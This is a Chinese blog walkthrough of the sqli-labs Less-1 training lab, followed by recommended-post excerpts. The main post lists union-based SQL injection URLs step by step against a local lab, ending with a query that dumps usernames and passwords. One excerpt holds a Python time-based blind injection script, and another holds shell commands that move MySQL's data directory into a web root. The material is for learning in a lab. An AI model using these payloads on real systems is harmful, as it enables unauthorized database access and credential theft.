SQL注入第一关-Less1

最新推荐文章于 2024-12-03 22:06:10 发布
最新推荐文章于 2024-12-03 22:06:10 发布
阅读量610 收藏 8
点赞数 18
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/liyuanxiaocilang/article/details/140969566
版权

1、判断注入点类型

单引号测试

http://127.0.0.1/Less-1/?id=1'

报错,属于字符型注入,SQL语法有错误;

则在后面加上 --+

http://127.0.0.1/Less-1/?id=1' -- +

注:进行验证: 若是数字不相等依然报错

http://127.0.0.1/Less-1/?id=1' and 1=2 --+

2、判断字段数

order by 查询字段个数,逐级增加order by 后面的数字,直到报错。这里是order by到第4个字段时报错,所以证明有3个字段。

http://127.0.0.1/Less-1/?id=1' order by  4  -- +

3、使用联合查询  确定显示位置

http://127.0.0.1/Less-1/?id=1' union select 1,2,3  -- +

     由于查询语句前面是对的,所以显示前面的内容,后面的无法显示,不能确定显示位置,所以更改语句,使得前面的语句为错,显示后面的内容:

http://127.0.0.1/Less-1/?id= -1' union select 1,2,3 --+

4、确定显示位置后,查询库名

http://127.0.0.1/Less-1/?id=-1' union select 1,version(),database() --+

字段数为3,所以1在这表示占位,version()查询数据库版本,database()查询数据库库名

5、查询表名


http://192.168.162.135/sqlilab/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security" --+

6、查询列名


http://127.0.0.1/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users" --+

7、查询用户名和密码

http://127.0.0.1/Less-1/?id=-1' union select 1,username,password from users where id=2 --+

雷柏年
关注
网络安全之sql注入-less1
koala_king的博客
08-17 1487
less-1 是字符注入,union注入的步骤一般有以下几步: 1、判断注入点 2、判断是整型还是字符型 3、判断查询列数 4、判断显示位 5、获取敏感信息 1、判断注入点 我们再Less1中看到,id将作为参数来使用,因此我们输入: http://localhost/Less-1/?id=1 这是看到访问了第一个用户的用户名和密码: 此时加入单引号进行尝试,这里是在id后面加了一个单引号,这里发现了语句的错误。 You have an error in your SQL syntax; check t
【靶场实操】sql-labs通关详解----第一节:基础注入方式(Less-1Less-10)
goldfish8848的博客
08-01 1360
SQL-Labs是一个专注于SQL注入攻击的在线靶场,提供了从基础到高级的多个关卡,供学习者实践和挑战。
SQL注入闯关第一关-Less1
qq_54037445的博客
10-06 2227
SQL注入闯关
sqli-Less1
qq_44060093的博客
04-19 567
最近准备拾起sql注入sql注入虽然去年就接触学习了,但是没有从原理入手学习,不精通 正好去年又学了数据库,这次颇有温故而知新的意思,温习一些以前掌握的,学习一些以前不知道的。 我用sqli开始学习sql注入,环境的搭建我之前也写过,挺简单的 首先看第一关,应该是没啥过滤,我们主要来学习步骤,流程,以及核心语句 首先发现id=1,可以查数据 再输入一个’ 可能有注入 构造?id=1’ and...
SQL闯关第一关
转瞬都有的博客
08-03 233
进行sql注入打靶场时,最重要的就是拿到表中字段的内容。一般是发现已经有SQL注入漏洞,然后进行简单的判断是数值型漏洞还是字符型漏洞,之后判断表中字段的个数。在之后就是爆出库名,表名,字段名。最终爆出字段里的内容。对此本文进行了详细的介绍。
sql注入第一关
m0_73639338的博客
12-03 1149
'and 1=1 --+ // 1=1的时候为真,页面显示正常;-1' union select 1,database(),3 --+ //从上图得,2和3有回显位置,在2的位置查询数据库名。-1' union select 1,2,3 --+ //前面查出存在3列,所以select 3列。即select 1,2,3。order by 1 --+ 页面正常 我们把参数一个一个往上加 2,3,4,5........得到表名 emails,referers,usgents,users。
SQL注入less-1
m0_62903168的博客
05-03 1317
注:phpstudy默认的php版本为7.x,想要成功的搭建靶场,需要把php版本改为5.x。
SQL注入实例(sqli-labs/less-8)
Thewei666的博客
08-05 430
确定闭合字符为单引号,并且正确页面与错误页面的显示不同。
【网络安全】-sql注入实战-sql-labs(1~10)
weixin_65311462的博客
09-01 1228
id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='数据库名' and table_name='表名' -- +id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='数据库名' -- +3.4 爆数据 :?
SQL注入实例(sqli-labs/less-18)
Thewei666的博客
08-08 423
先使用brup爆破密码,账号admin,密码admin。
sql注入复现(1-14关)
weixin_65785894的博客
08-06 1260
判断注入是否存在判断sql语句是否拼接可以根据结果指定是字符型且存在。因为该页面存在回显,所以我们可以使用联合查询。联合注入爆列首先知道表格有几列,如果报错就是超出列数,显示正常则是没有超出列数(使用二分法,先查看一个大的数值,显示正常,则翻倍,报错则缩小一半数值)爆显示位由于我们已经知道了这个表有三列,所以我们使用联合查询来爆出显示位由于只能查看一组数据,所以我们需要修改id值,让他要么远超这个数据表,要么小于0爆数据库名和版本号。
sql_libs第一关
Xor0ne
02-17 1155
第一关通关笔记:2019/6/16 低等级详解的相关网站:https://www.jianshu.com/p/078df7a35671 http://www.storysec.com/dvwa-sql-injection.html dvwa的闯关:https://www.freebuf.com/articles/web/120747.html BP:https://blog.csdn.ne...
Sql注入(靶场)第一关
m0_68706634的博客
12-02 771
其中,information_schma数据库中tables表就存了所有表的名字,其中table_name对应表名,而table_schema对应这个表在哪个库(information_schma数据库中还有一个叫columns的表,记录了所有表中列名的数据)id=1' order by 3 --+ (--+的作用是将代码后面的LIMIT 0,1'';id=1' and '1'='2' union select 1,2,3 --+访问:http://ip地址/sqlilab/Less-1/?
sqli-labs—————Less-1(字符型注入
Fly_鹏程万里
05-08 2077
前言从这一篇文章开始,我们将开始真正的讲解Sqli-libs中的各种注入,从第1阶层开始,后续的内容会陆续放出,欢迎各位大佬的关注与评论!Less-1首先,打开主页进入第一关:可以看到提示,提示我们要传入一个参数,名为ID,而且是数据类型,那么我就传入该参数看看到这里,我们可以发现后台执行的SQL语句好像是根据该传入的参数id进行了相应的查询,那么我可以从搭建的环境中来看看它的数据库到底有什么东西...
sqli-labs系列——第一关
1匹黑马
04-26 4015
文章目录判断注入类型开始注入 判断注入类型 首先判断是什么类型的注入,这里是字符型的: 1' and '1'='1 //正常 1' and '1'='2 //错误 开始注入 末尾的注释符#被过滤,所以报错了: URL编码绕过,列长度为3: 爆注入点: 'union SELECT 1,2,3%23 爆表名: http://192.168.1.113:86/Less-1/?id='uni...
SQL注入——Less-1(学习笔记)
qq_41759633的博客
07-30 712
首先我们需要了解什么是数据库注入以及其原理,我会在后面的文章中更新内容 下面进去sql-less第一关 字符型注入漏洞 进入页面之后就是这个页面在?id=1后面加上单引号来判断是否存在注入漏洞 但是其页面返回错误那么加上一个注释符–+返回以下页面 可以看到加上注释符后页面返回正常那么接下来我们使用 roder by *来判断该注入漏洞存在字段数 可以看到在测试order by 3返回正常...
less-1】基于SQLI的SQL字符型报错注入
未名编程
07-17 503
实验声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险! 文章目录实验目的实验环境实验原理实验步骤第一步 登录SQLI-Labs平台第二步 登录Kali平台,启动Firefox浏览器访问SQLI-Labs的less-1第三步 尝试判断是否存在SQL注入以及哪种注入类型第四步 手工SQL注入获得数据库的用户名与密码思考与总结 实验目的 通过本实验理解数字型报错SQL注入漏洞点的定位方法,掌握利用手工方式完成一次完整SQL注入的过程,熟悉常见SQL注入命令的操作。 实验环境 渗透主.
Sql-labs 第一关超详细讲解
A9874564的博客
02-21 6273
一.Sql注入含义 所谓的sql注入就是通过某种方式将恶意的sql代码添加到输入参数中,然后传递到sql服务器使其解析并执行的一种攻击手法。 二.注入思路 1.判断是否存在注入注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.得到数据 三.判断是否存在注入点 ...
SQL注入——Less-1-5(学习笔记)
xdjxi的博客
02-25 2358
第一关 1.经过语句and 1=2测试 ,页面回显正常,所以该地方不是数值查询 2.接着尝试在id后面加上',发现页面回显不正常,表示可能存在SQL字符注入 3.输入--+将sql后面的语句注视掉后,发现页面回显正常,则证明这个地方是单引号字符型注入 4.接着使用order by 语句判断,该表中一共有几列数据 order by 3页面回显正常,order by 4页面回显不正常,说明此表一个有3列。5.将id=1改为一个数据库不存在的id值,如861,使用union select 1...
SQl注入文件上传及sqli-labs第八关less-8
最新发布
01-04
### SQL注入文件上传方法 在处理SQL注入中的文件上传漏洞时,通常涉及利用应用程序的安全配置缺陷来绕过文件类型的验证机制。当提到`Less-7`这一关卡时,在特定条件下允许攻击者通过修改服务器上的某些设置实现任意文件上传的目的[^2]。 为了完成此操作,需要具备对目标系统的较高控制级别,比如更改MySQL的数据目录至Web可访问路径下,并确保拥有足够的权限执行这些变更动作。然而值得注意的是,这种做法仅限于实验环境内用于学习目的,绝不可应用于生产环境中尝试非法入侵行为。 具体实施步骤如下所示: 1. 将MySQL数据存储位置更改为Web服务器能够访问的位置; 2. 重启MySQL服务使上述改动生效; 3. 构造特殊请求向应用提交恶意文件并触发其保存到指定表单字段关联的列中; 4. 访问已成功上载的文件以进一步开展后续渗透活动。 ```python import os os.system('service mysql stop') os.system('sed -i "s/datadir.*$/datadir=\/var\/www\/html/" /etc/mysql/my.cnf') # 修改my.cnf文件中的datadir项指向新的路径 os.system('chown -R mysql:mysql /var/www/html/') # 更改新路径下的所有权给mysql用户组 os.system('chmod 755 /var/www/html/') # 设置适当权限以便让webserver可以读取该目录内的内容 os.system('service mysql start') # 启动mysql服务 ``` 请注意以上代码片段仅为理论说明用途,请勿随意运行! --- ### Sqli-labs Less-8 解决方案 对于`sqli-labs`项目里的第八关挑战——`Less-8`而言,这里主要考察了基于时间盲注技术的时间延迟型SQL注入技巧的应用场景。根据题目描述可知存在三个必要前提条件:参数可控、缺乏充分过滤措施以及最终会被送入后台数据库引擎加以解释执行[^3]。 考虑到页面本身并没有提供任何直接反馈信息告知我们所构建的有效负载是否被正确接收到了后端逻辑层面上去,因此借助布尔表达式的真假性质配合着延时函数(如sleep())来进行间接判断成为了一种可行策略。下面给出一段Python脚本来自动化获取当前使用的默认数据库名称作为例子展示如何运用此类手法破解难题[^5]。 ```python def inject_database_name(url): db_name = '' for position in range(1, 21): # 假设最长不超过20字符长度 char_found = False lower_bound = 32 # ASCII码空格符起始处 upper_bound = 126 # 可见ASCII字符结束标志 while not char_found and lower_bound <= upper_bound: guess_char_ascii = (lower_bound + upper_bound) >> 1 injection_string = f"1' AND IF(ASCII(SUBSTRING((SELECT database()),{position},1))>{guess_char_ascii}, sleep(5), 'false') -- " response_time_start = time.time() requests.get(f"{url}?id={injection_string}") elapsed_seconds = round(time.time()-response_time_start) if elapsed_seconds >= 5: # 如果响应超出了设定阈值,则表示猜测正确 lower_bound = guess_char_ascii + 1 char_found = True elif elapsed_seconds < 5: upper_bound = guess_char_ascii - 1 actual_character = chr(lower_bound) if char_found else '_' print(actual_character,end='') inject_database_name(target_url) ``` 这段程序会逐位猜解出完整的数据库名字串,每一轮迭代都会发送HTTP GET请求携带精心设计过的payload字符串过去等待服务器回应。一旦发现异常延长的现象即意味着我们的假设成立从而锁定相应位置上的确切字母或数字直至整个序列全部揭露出来为止。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值